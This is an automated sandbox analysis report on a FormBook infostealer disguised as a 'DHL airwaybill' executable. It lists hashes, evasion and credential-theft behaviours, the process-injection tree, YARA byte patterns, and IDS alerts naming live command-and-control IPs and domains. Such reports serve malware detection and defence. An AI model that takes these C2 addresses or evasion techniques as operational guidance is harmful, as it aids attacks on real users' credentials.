Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL airwaybill # 6913321715 & BL Draft copy.exe

Overview

General Information

Sample name:DHL airwaybill # 6913321715 & BL Draft copy.exe
Analysis ID:1505412
MD5:7e3feacbde086188081c1fa2c0891090
SHA1:c3a3e3d1c8d8d716ce7ce4d2e3a32271d75fdbda
SHA256:07374ff867cc60e550cbae355fbb87e46eb76fc7cd74ba4005125d1ac3329e52
Tags:DHLexe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL airwaybill # 6913321715 & BL Draft copy.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe" MD5: 7E3FEACBDE086188081C1FA2C0891090)
    • DHL airwaybill # 6913321715 & BL Draft copy.exe (PID: 3620 cmdline: "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe" MD5: 7E3FEACBDE086188081C1FA2C0891090)
      • toceDGfrPzLv.exe (PID: 5412 cmdline: "C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mshta.exe (PID: 3508 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • firefox.exe (PID: 1944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17212:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17212:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-06T09:04:58.073868+020020507451Malware Command and Control Activity Detected192.168.2.6497233.33.130.19080TCP
            2024-09-06T09:05:21.548286+020020507451Malware Command and Control Activity Detected192.168.2.64972965.21.196.9080TCP
            2024-09-06T09:05:35.323271+020020507451Malware Command and Control Activity Detected192.168.2.649734162.240.81.1880TCP
            2024-09-06T09:05:49.332222+020020507451Malware Command and Control Activity Detected192.168.2.649739192.185.16.20980TCP
            2024-09-06T09:06:08.287501+020020507451Malware Command and Control Activity Detected192.168.2.649744154.23.184.24080TCP
            2024-09-06T09:06:29.841068+020020507451Malware Command and Control Activity Detected192.168.2.64974865.21.196.9080TCP
            2024-09-06T09:06:43.148784+020020507451Malware Command and Control Activity Detected192.168.2.649752184.94.212.11580TCP
            2024-09-06T09:06:56.875392+020020507451Malware Command and Control Activity Detected192.168.2.64975791.215.85.2380TCP
            2024-09-06T09:07:11.581505+020020507451Malware Command and Control Activity Detected192.168.2.649761121.199.37.1980TCP
            2024-09-06T09:07:25.218313+020020507451Malware Command and Control Activity Detected192.168.2.649765188.114.96.380TCP
            2024-09-06T09:07:39.405725+020020507451Malware Command and Control Activity Detected192.168.2.6497693.33.130.19080TCP
            2024-09-06T09:08:01.970754+020020507451Malware Command and Control Activity Detected192.168.2.6497735.144.130.5280TCP
            2024-09-06T09:08:15.289436+020020507451Malware Command and Control Activity Detected192.168.2.649777162.241.226.19080TCP
            2024-09-06T09:08:30.166098+020020507451Malware Command and Control Activity Detected192.168.2.649782217.160.0.19380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-06T09:04:58.073868+020028554651A Network Trojan was detected192.168.2.6497233.33.130.19080TCP
            2024-09-06T09:05:21.548286+020028554651A Network Trojan was detected192.168.2.64972965.21.196.9080TCP
            2024-09-06T09:05:35.323271+020028554651A Network Trojan was detected192.168.2.649734162.240.81.1880TCP
            2024-09-06T09:05:49.332222+020028554651A Network Trojan was detected192.168.2.649739192.185.16.20980TCP
            2024-09-06T09:06:08.287501+020028554651A Network Trojan was detected192.168.2.649744154.23.184.24080TCP
            2024-09-06T09:06:29.841068+020028554651A Network Trojan was detected192.168.2.64974865.21.196.9080TCP
            2024-09-06T09:06:43.148784+020028554651A Network Trojan was detected192.168.2.649752184.94.212.11580TCP
            2024-09-06T09:06:56.875392+020028554651A Network Trojan was detected192.168.2.64975791.215.85.2380TCP
            2024-09-06T09:07:11.581505+020028554651A Network Trojan was detected192.168.2.649761121.199.37.1980TCP
            2024-09-06T09:07:25.218313+020028554651A Network Trojan was detected192.168.2.649765188.114.96.380TCP
            2024-09-06T09:07:39.405725+020028554651A Network Trojan was detected192.168.2.6497693.33.130.19080TCP
            2024-09-06T09:08:01.970754+020028554651A Network Trojan was detected192.168.2.6497735.144.130.5280TCP
            2024-09-06T09:08:15.289436+020028554651A Network Trojan was detected192.168.2.649777162.241.226.19080TCP
            2024-09-06T09:08:30.166098+020028554651A Network Trojan was detected192.168.2.649782217.160.0.19380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-06T09:05:13.887462+020028554641A Network Trojan was detected192.168.2.64972565.21.196.9080TCP
            2024-09-06T09:05:16.457325+020028554641A Network Trojan was detected192.168.2.64972765.21.196.9080TCP
            2024-09-06T09:05:18.984331+020028554641A Network Trojan was detected192.168.2.64972865.21.196.9080TCP
            2024-09-06T09:05:27.680015+020028554641A Network Trojan was detected192.168.2.649731162.240.81.1880TCP
            2024-09-06T09:05:30.217391+020028554641A Network Trojan was detected192.168.2.649732162.240.81.1880TCP
            2024-09-06T09:05:32.775792+020028554641A Network Trojan was detected192.168.2.649733162.240.81.1880TCP
            2024-09-06T09:05:41.648087+020028554641A Network Trojan was detected192.168.2.649736192.185.16.20980TCP
            2024-09-06T09:05:44.232124+020028554641A Network Trojan was detected192.168.2.649737192.185.16.20980TCP
            2024-09-06T09:05:46.700782+020028554641A Network Trojan was detected192.168.2.649738192.185.16.20980TCP
            2024-09-06T09:06:00.673507+020028554641A Network Trojan was detected192.168.2.649741154.23.184.24080TCP
            2024-09-06T09:06:03.167528+020028554641A Network Trojan was detected192.168.2.649742154.23.184.24080TCP
            2024-09-06T09:06:05.778487+020028554641A Network Trojan was detected192.168.2.649743154.23.184.24080TCP
            2024-09-06T09:06:22.189612+020028554641A Network Trojan was detected192.168.2.64974565.21.196.9080TCP
            2024-09-06T09:06:24.737470+020028554641A Network Trojan was detected192.168.2.64974665.21.196.9080TCP
            2024-09-06T09:06:27.323067+020028554641A Network Trojan was detected192.168.2.64974765.21.196.9080TCP
            2024-09-06T09:06:35.510266+020028554641A Network Trojan was detected192.168.2.649749184.94.212.11580TCP
            2024-09-06T09:06:38.151543+020028554641A Network Trojan was detected192.168.2.649750184.94.212.11580TCP
            2024-09-06T09:06:40.600160+020028554641A Network Trojan was detected192.168.2.649751184.94.212.11580TCP
            2024-09-06T09:06:49.258887+020028554641A Network Trojan was detected192.168.2.64975491.215.85.2380TCP
            2024-09-06T09:06:52.613533+020028554641A Network Trojan was detected192.168.2.64975591.215.85.2380TCP
            2024-09-06T09:06:54.344365+020028554641A Network Trojan was detected192.168.2.64975691.215.85.2380TCP
            2024-09-06T09:07:04.273408+020028554641A Network Trojan was detected192.168.2.649758121.199.37.1980TCP
            2024-09-06T09:07:06.426978+020028554641A Network Trojan was detected192.168.2.649759121.199.37.1980TCP
            2024-09-06T09:07:09.026693+020028554641A Network Trojan was detected192.168.2.649760121.199.37.1980TCP
            2024-09-06T09:07:17.619609+020028554641A Network Trojan was detected192.168.2.649762188.114.96.380TCP
            2024-09-06T09:07:20.122717+020028554641A Network Trojan was detected192.168.2.649763188.114.96.380TCP
            2024-09-06T09:07:22.713243+020028554641A Network Trojan was detected192.168.2.649764188.114.96.380TCP
            2024-09-06T09:07:30.825610+020028554641A Network Trojan was detected192.168.2.6497663.33.130.19080TCP
            2024-09-06T09:07:33.381973+020028554641A Network Trojan was detected192.168.2.6497673.33.130.19080TCP
            2024-09-06T09:07:35.906942+020028554641A Network Trojan was detected192.168.2.6497683.33.130.19080TCP
            2024-09-06T09:07:46.035534+020028554641A Network Trojan was detected192.168.2.6497705.144.130.5280TCP
            2024-09-06T09:07:48.582234+020028554641A Network Trojan was detected192.168.2.6497715.144.130.5280TCP
            2024-09-06T09:07:51.129078+020028554641A Network Trojan was detected192.168.2.6497725.144.130.5280TCP
            2024-09-06T09:08:07.624536+020028554641A Network Trojan was detected192.168.2.649774162.241.226.19080TCP
            2024-09-06T09:08:10.175077+020028554641A Network Trojan was detected192.168.2.649775162.241.226.19080TCP
            2024-09-06T09:08:12.769226+020028554641A Network Trojan was detected192.168.2.649776162.241.226.19080TCP
            2024-09-06T09:08:21.131653+020028554641A Network Trojan was detected192.168.2.649778217.160.0.19380TCP
            2024-09-06T09:08:23.701868+020028554641A Network Trojan was detected192.168.2.649779217.160.0.19380TCP
            2024-09-06T09:08:26.330692+020028554641A Network Trojan was detected192.168.2.649780217.160.0.19380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.kalomor.top/pf98/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: kalomor.topVirustotal: Detection: 7%Perma Link
            Source: www.kalomor.topVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeReversingLabs: Detection: 60%
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeVirustotal: Detection: 53%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeJoe Sandbox ML: detected
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ZYkF.pdbSHA256 source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: ZYkF.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: mshta.pdbGCTL source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: toceDGfrPzLv.exe, 00000005.00000002.4604412085.0000000000FFE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 6_2_0053C210 FindFirstFileW,FindNextFileW,FindClose,6_2_0053C210
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 4x nop then pop edi5_2_05F83659
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 4x nop then xor eax, eax5_2_05F86BA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then xor eax, eax6_2_00529C00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi6_2_0052DDB3
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then mov ebx, 00000004h6_2_031B04E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49731 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 192.185.16.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49732 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49725 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49729 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49729 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49734 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49734 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49737 -> 192.185.16.209:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49723 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49723 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49744 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49744 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49739 -> 192.185.16.209:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49739 -> 192.185.16.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 192.185.16.209:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49745 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49746 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49748 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49748 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49769 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49769 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49749 -> 184.94.212.115:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49773 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49777 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49757 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49764 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49755 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49733 -> 162.240.81.18:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49751 -> 184.94.212.115:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49762 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49776 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49763 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49760 -> 121.199.37.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49775 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49768 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49777 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49773 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49757 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49774 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49771 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49765 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49765 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49778 -> 217.160.0.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49750 -> 184.94.212.115:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49780 -> 217.160.0.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49741 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49747 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49759 -> 121.199.37.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49761 -> 121.199.37.19:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49761 -> 121.199.37.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49767 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49754 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49766 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49770 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49756 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49752 -> 184.94.212.115:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49758 -> 121.199.37.19:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49752 -> 184.94.212.115:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49772 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49782 -> 217.160.0.193:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49782 -> 217.160.0.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49779 -> 217.160.0.193:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030003678.xyz
            Source: DNS query: www.030002721.xyz
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 91.215.85.23 91.215.85.23
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
